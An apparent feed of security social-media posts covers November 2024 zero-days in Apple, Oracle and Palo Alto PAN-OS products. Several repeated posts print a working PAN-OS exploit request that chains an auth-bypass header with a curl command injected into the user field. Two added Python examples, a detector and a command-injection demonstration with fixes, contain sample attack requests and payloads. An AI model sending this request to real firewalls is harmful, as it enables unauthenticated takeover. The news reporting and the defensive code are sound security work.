##If you missed this yesterday, update your iPhone. This relates to CVE-2024-44308 and CVE-2024-44309.
#Apple Issues Emergency Security Update for Actively Exploited Vulnerabilities https://www.infosecurity-magazine.com/news/apple-security-update/ #cybersecurity #infosec
Apple security advisories: https://support.apple.com/en-us/100100
##Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) https://www.helpnetsecurity.com/2024/11/20/cve-2024-44309-cve-2024-44308/ #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS
##📣 EMERGENCY UPDATES 📣
Apple pushed additional updates for 2 zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1
##📣 EMERGENCY UPDATES 📣
Apple pushed additional updates for 2 zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1
##📣 EMERGENCY UPDATES 📣
Apple pushed updates for 2 new zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore),
🐛 CVE-2024-44309 (WebKit):
- iOS and iPadOS 17.7.2
- iOS and iPadOS 18.1.1
- macOS Sequoia 15.1.1
updated 2024-11-20T16:44:13
1 posts
1 repos
Today I am publishing the technical details of CVE-2024-44625, an unpatched RCE vulnerability in Gogs: https://fysac.github.io/posts/2024/11/unpatched-remote-code-execution-in-gogs/
##updated 2024-11-20T15:30:50
3 posts
1 repos
4,000,000 WordPress Sites Using Really Simple Security Free and Pro Versions Affected by Critical Authentication Bypass Vulnerability
#CVE_2024_10924
https://www.wordfence.com/blog/2024/11/really-simple-security-vulnerability/
MORE THAN 4 MILLION WORDPRESS SITES AT RISK
More than 4 million sites running the WordPress CMS are at risk because of a critical vulnerability discovered by Wordfence Security specialists in the well-known Really Simple SSL plugin and its PRO version.
This is one of the most serious vulnerabilities in WordPress plugins in the last 12 years!
The threat was discovered on 6 November 2024, is tracked as CVE-2024-10924 and has a CVSS severity score of 9.8. The vulnerability lets an attacker remotely gain access to any WordPress account, including Administrator, even when two-factor authentication is enabled!
On 12-14 November 2024 the Really Simple SSL development team released patched version 9.1.2 of both plugins, in which the vulnerability is fully fixed.
A technical analysis of this vulnerability is published on the Wordfence site:
https://www.wordfence.com/blog/2024/11/really-simple-security-vulnerability/
Conclusions:
- Keep the number of additional plugins on your WordPress site to a minimum. The fewer plugins, the lower the risk of being compromised without noticing.
- Do not use cracked, nulled or pirated plugins.
- Regularly update WordPress and all of its components to the latest current versions. Do not put it off.
- Keep up with the latest cybersecurity news so that you learn about incidents in time and can respond to them.
- Back up your sites so that you can recover in the event of a compromise or attack.
If you know someone who uses these plugins on their site, we recommend sharing this advice with them to keep their site secure, since this vulnerability poses a significant risk.
If you need help, get in touch, we are at your service: https://kr-labs.com.ua/blog/wordpress-security-recommendations/
#wordpress #vulnerability #cybernews #cybercrine #hacked #кібербезпека #новини #cybersecurity #ReallySimpleSSL #ReallySimpleSecurity #CVE_2024_10924 #infosec #hack
##updated 2024-11-20T00:32:20
27 posts
iOS 18.1.1 and macOS Sequoia 15.1.1 close actively exploited security holes
With the new updates iOS 18.1.1 and macOS Sequoia 15.1.1, Apple has closed significant security vulnerabilities which, according to repo
https://www.apfeltalk.de/magazin/feature/ios-18-1-1-und-macos-sequoia-15-1-1-schliessen-aktiv-ausgenutzte-sicherheitsluecken/
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit
Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##Update now! Apple confirms vulnerabilities are already being exploited
#CVE_2024_44308 #CVE_2024_44309
https://www.malwarebytes.com/blog/news/2024/11/update-now-apple-confirms-vulnerabilities-are-being-exploited
Apple exploited zero-days
CVE-2024-44308 JavaScriptCore Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
CVE-2024-44309 WebKit Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n
#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309
##If you missed this yesterday, update your iPhone. This relates to CVE-2024-44308 and CVE-2024-44309.
#Apple Issues Emergency Security Update for Actively Exploited Vulnerabilities https://www.infosecurity-magazine.com/news/apple-security-update/ #cybersecurity #infosec
Apple security advisories: https://support.apple.com/en-us/100100
##Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) https://www.helpnetsecurity.com/2024/11/20/cve-2024-44309-cve-2024-44308/ #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS
##📣 EMERGENCY UPDATES 📣
Apple pushed additional updates for 2 zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1
📣 EMERGENCY UPDATES 📣
Apple pushed additional updates for 2 zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1
📣 EMERGENCY UPDATES 📣
Apple pushed updates for 2 new zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore),
🐛 CVE-2024-44309 (WebKit):
- iOS and iPadOS 17.7.2
- iOS and iPadOS 18.1.1
- macOS Sequoia 15.1.1
updated 2024-11-20T00:32:14
5 posts
1 repos
Google Chrome security advisory: Stable Channel Update for Desktop
New Chrome version 131.0.6778.85/.86 for Windows, Mac and 131.0.6778.85 for Linux includes 3 security fixes, 1 externally reported: CVE-2024-11395 (high severity) Type Confusion in V8. No mention of exploitation.
#Google #Chrome #chromium #vulnerability #CVE #CVE_2024_11395
##CVE-2024-11395
Type Confusion in V8 in Google Chrome prior to 131.0.6778.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
If you are security cautious you might want to avoid using Chrome till this is fixed, if I understood it correctly. Feel free to correct me, I will be trying to build a PoC... in my lab
I just like saying '..in my lab'
##updated 2024-11-19T20:25:31
4 posts
CVE Alert: CVE-2024-0793 - https://www.redpacketsecurity.com/cve_alert_cve-2024-0793/
##updated 2024-11-19T20:01:04.877000
1 posts
Some fairly interesting stuff for this #PatchTuesday!
Of particular note for me, a 9.9 in Azure CycleCloud (CVE-2024-43602), a Windows AppContainer escape (CVE-2024-49039), and an RCE in .NET/Visual Studio (CVE-2024-43498)? That one needs more detail.
https://www.zerodayinitiative.com/blog/2024/11/12/the-november-2024-security-update-review
##updated 2024-11-19T18:31:00
7 posts
1 repos
Oracle exploited zero-day: Security Alert CVE-2024-21287 Released
It was reported as being actively exploited "in the wild" by CrowdStrike.
Oracle's actual security advisory Oracle Security Alert Advisory - CVE-2024-21287 is useless because it doesn't mention exploitation.
h/t: @lawrenceabrams See Bleeping Computer reporting: Oracle warns of Agile PLM file disclosure flaw exploited in attacks
cc: @campuscodi @mttaggart @cR0w @ntkramer @iagox86 @dreadpir8robots @catc0n @harrysintonen @neurovagrant etc.
#oracle #agile #oracleagileplm #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_21287
##Tracked as CVE-2024-21287 (CVSS score of 7.5), the zero-day affects Agile PLM version 9.3.6 and can be exploited remotely without authentication. https://www.securityweek.com/oracle-patches-exploited-agile-plm-zero-day/
##Oracle warns of Agile PLM file disclosure flaw exploited in attacks
Oracle has fixed an unauthenticated file disclosure flaw in Oracle Agile Product Lifecycle Management (PLM) tracked as CVE-2024-21287, which was...
🔗️ [Bleepingcomputer] https://link.is.it/7jwrwy
##Oracle patches exploited Agile PLM vulnerability (CVE-2024-21287) https://www.helpnetsecurity.com/2024/11/19/cve-2024-21287/ #productdevelopment #CrowdStrike #enterprise #Don'tmiss #Hotstuff #Tenable #Oracle #News
##updated 2024-11-19T18:30:58
4 posts
CVE Alert: CVE-2024-52867 - https://www.redpacketsecurity.com/cve_alert_cve-2024-52867/
##updated 2024-11-19T17:17:29.723000
57 posts
1 repos
How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
##Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited https://thecyberexpress.com/palo-alto-pan-os-two-bugs-under-exploitation/ #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS
##watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.
#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity
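Added example, not taken from any of the posts above and not Palo Alto Networks' or watchTowr's code: a small Python triage script that checks a raw HTTP request for the three things the PoC request and the watchTowr root-cause analysis above describe, the `X-PAN-AUTHCHECK: off` header (CVE-2024-0012), a request to `createRemoteAppwebSession.php`, and shell metacharacters in the `user` form field (CVE-2024-9474). The host names, the sample requests and the verdict strings are constructed for this illustration; the `as_shell_argument` helper shows the general fix for the metacharacter problem (quote before a value can reach a shell) and is not PAN-OS code.

```python
"""Triage raw HTTP requests for the PAN-OS CVE-2024-0012 / CVE-2024-9474
exploit chain.  Illustration code for this page; all samples are constructed."""
import re
import shlex
from typing import Dict, Tuple
from urllib.parse import parse_qs

# Characters that let a username reach a shell as more than a literal string:
# command substitution (backtick, $( ), separators and redirections.
SHELL_META = re.compile(r"[`;|&<>\n]|\$\(")
TARGET_SCRIPT = "createremoteappwebsession.php"


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (method, target, headers, body).
    Header names are lower-cased (HTTP header names are case-insensitive).
    Assumes CRLF line endings and one header per line."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def classify(raw: str) -> str:
    """Return a verdict string for one request (constructed labels)."""
    method, target, headers, body = parse_request(raw)
    # CVE-2024-0012: the header value 'off' turned authentication off.
    auth_bypass = headers.get("x-pan-authcheck", "").lower() == "off"
    # The PoC hits createRemoteAppwebSession.php with a trailing /aaaa.js.map,
    # so match the script name anywhere in the path, not the exact path.
    hits_script = TARGET_SCRIPT in target.lower()
    # parse_qs percent-decodes, so a backtick sent as %60 is seen as a backtick.
    params = parse_qs(body, keep_blank_values=True) if method == "POST" else {}
    user = params.get("user", [""])[0]
    role = params.get("userRole", [""])[0]
    shell_meta = bool(SHELL_META.search(user))

    if auth_bypass and hits_script and shell_meta:
        return "critical: unauthenticated RCE chain (CVE-2024-0012 + CVE-2024-9474)"
    if auth_bypass:
        return "high: auth-bypass header present (CVE-2024-0012)"
    if hits_script and shell_meta:
        return "high: shell metacharacters in user (CVE-2024-9474, authenticated)"
    if hits_script and role == "superuser":
        return "medium: session request asking for the superuser role"
    return "benign"


def as_shell_argument(user: str) -> str:
    """The missing step on the vulnerable path: a value that must be handed to
    a shell is quoted so that metacharacters stay literal text."""
    return shlex.quote(user)


# Constructed sample requests (not real captures; hosts are placeholders).
EXPLOIT_REQUEST = (
    "POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1\r\n"
    "Host: fw.example.test\r\n"
    "X-PAN-AUTHCHECK: off\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=`curl attacker.example.test`&userRole=superuser&remoteHost=&vsys=vsys1"
)
ENCODED_REQUEST = (  # same attack, header case varied and backticks percent-encoded
    "POST /php/utils/createRemoteAppwebSession.php/x.js.map HTTP/1.1\r\n"
    "Host: fw.example.test\r\n"
    "X-Pan-AuthCheck: OFF\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=%60curl%20attacker.example.test%60&userRole=superuser&remoteHost=&vsys=vsys1"
)
LEGIT_REQUEST = (  # ordinary username, no bypass header, but asks for superuser
    "POST /php/utils/createRemoteAppwebSession.php HTTP/1.1\r\n"
    "Host: fw.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=alice&userRole=superuser&remoteHost=&vsys=vsys1"
)
LOGIN_GET = "GET /php/login.php HTTP/1.1\r\nHost: fw.example.test\r\n\r\n"


if __name__ == "__main__":
    samples = [("exploit", EXPLOIT_REQUEST), ("encoded", ENCODED_REQUEST),
               ("legit", LEGIT_REQUEST), ("login", LOGIN_GET)]
    for name, req in samples:
        print(f"{name:8s} -> {classify(req)}")
    print("quoted user:", as_shell_argument("`curl attacker.example.test`"))
```

Running the file prints one verdict per sample. The header check lower-cases both the name and the value, and the body goes through `parse_qs`, so a percent-encoded backtick or a differently cased header does not slip past the rule; the `userRole=superuser` check on its own is only flagged as medium because, per the advisory text quoted above, it needs the bypass or a valid session to matter.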
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
#CVE_2024_0012 #CVE_2024_9474
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.
h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares
#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC
##Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474
Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
New Indicators of compromise at Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC
##watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.
#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity
##CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.
h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares
#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC
##Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474
Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
New Indicators of compromise at Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC
##How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
##Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited https://thecyberexpress.com/palo-alto-pan-os-two-bugs-under-exploitation/ #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS
##How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
##Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited https://thecyberexpress.com/palo-alto-pan-os-two-bugs-under-exploitation/ #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS
##watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.
#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
#CVE_2024_0012 #CVE_2024_9474
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.
h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares
#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC
##Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474
Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
New Indicators of compromise at Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC
##watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.
#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity
##CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.
h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares
#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
###PaloAlto Unit 42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ #cybersecurity #Infosec
##New Episode: ISC StormCast for Wednesday, November 20th, 2024
Shownotes:
Detecting the Presence of a Debugger in Linux
https://isc.sans.edu/diary/Detecting%20the%20Presence%20of%20a%20Debugger%20in%20Linux/31450
Palo Alto Patches
https://security.paloaltonetworks.com/CVE-2024-0012
https://security.paloalt
##Updates on PAN-SA-2024-0015: The blog has been updated with the following latest information provided by Palo Alto.
1) CVE-2024-0012 has been assigned
2) Indicators of Compromise has been updated.
3) Added a section "What if I found one of the IOCs in my Organization's environment??"
4) Affected Products and Product versions has been updated
5) Fixed versions has been updated.
Refer: https://patchnow24x7.com/blog-1/f/pan-sa-2024-0015-secure-your-paloalto-management-interface-now
#PatchNOW #Vulnerability #ComputerSecurity #hacked #Cyberattack #infosec #informationsecurity #CyberSecurityAwareness #DataBreach #cybersecurity
##r u freakin' kidding me? "X-PAN-AUTHCHECK: off" - seriously?!
##Favorite quote from WatchTowr's blog about PAN-OS vuln:
##I guess auto_prepend_file actually has legitimate use besides writing PHP exploits.
Reading the awesome WatchTowr writeup of CVE-2024-0012 and CVE-2024-9474, the Palo Alto RCE/privesc one-two punch. Great work here as always. And h/t to @screaminggoat , of course.
A few things stand out:
First, sorry @cR0w, no #directorytraversalmemes for you:
We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?! At this point, why is anyone surprised? That's right folks, a simple reproducer for CVE-2024-0012. It couldn't be easier than that.
That's the auth bypass. And then, WHAT IS THIS DOING IN ANYTHING
return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");
So obviously if that $username has shell metacharacters, you have yourself a nice command injection.
And guess what user the service runs as?
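Added example (not from any post above, and not Palo Alto Networks or watchTowr code): the code pattern the quoted pexecute() line shows, rebuilt in Python so it can be run side by side with the non-vulnerable forms. The real binary /usr/local/bin/pan_elog is not available here, so `echo` stands in for it; the injected command then shows up as an extra output line. The helper names, the allow-list regex and the "admin; echo INJECTED" payload are this example's own assumptions.

```python
"""Command injection through string interpolation, and two fixes.

Stand-in for pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username"):
`echo` replaces pan_elog so the example runs anywhere with /bin/sh.
"""
import re
import subprocess

STAND_IN = "echo"  # placeholder for /usr/local/bin/pan_elog (assumption)
# Allow-list for usernames: letters, digits and a few punctuation characters.
USERNAME_OK = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")


def audit_log_vulnerable(msg: str, username: str) -> str:
    """One command string handed to /bin/sh, as in the quoted PHP line:
    metacharacters in username are parsed by the shell as new commands."""
    cmdline = f"{STAND_IN} -u audit -m {msg} -o {username}"
    proc = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return proc.stdout


def audit_log_argv(msg: str, username: str) -> str:
    """Same call without a shell: the username is passed as exactly one
    argv element, whatever characters it contains, so nothing is injected."""
    argv = [STAND_IN, "-u", "audit", "-m", msg, "-o", username]
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout


def audit_log_hardened(msg: str, username: str) -> str:
    """argv form plus input validation: a value that does not look like a
    username is rejected before any command is built."""
    if not USERNAME_OK.fullmatch(username):
        raise ValueError(f"rejected username {username!r}")
    return audit_log_argv(msg, username)


if __name__ == "__main__":
    payload = "admin; echo INJECTED"  # constructed payload
    print("shell string :", audit_log_vulnerable("login", payload).splitlines())
    print("argv list    :", audit_log_argv("login", payload).splitlines())
    try:
        audit_log_hardened("login", payload)
    except ValueError as err:
        print("hardened     :", err)
```

With the shell string, the payload produces a second output line ("INJECTED"); with the argv list the same bytes arrive as a single literal argument after `-o`. Validation is the second layer, not a replacement for dropping the shell.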
##WatchTower: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/ #cybersecurity #infosec #PaloAlto
##If you missed this, #PaloAlto has patched a Firewall Zero-Day Exploited in Operation Lunar Peek https://www.securityweek.com/palo-alto-patches-firewall-zero-day-exploited-in-operation-lunar-peek/ @SecurityWeek @ekovacs
More:
Palo Alto Unit 42 posted this yesterday about Lunar Peek activity related to CVE-2024-0012: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
##@christopherkunz Palo Alto keeps on giving.
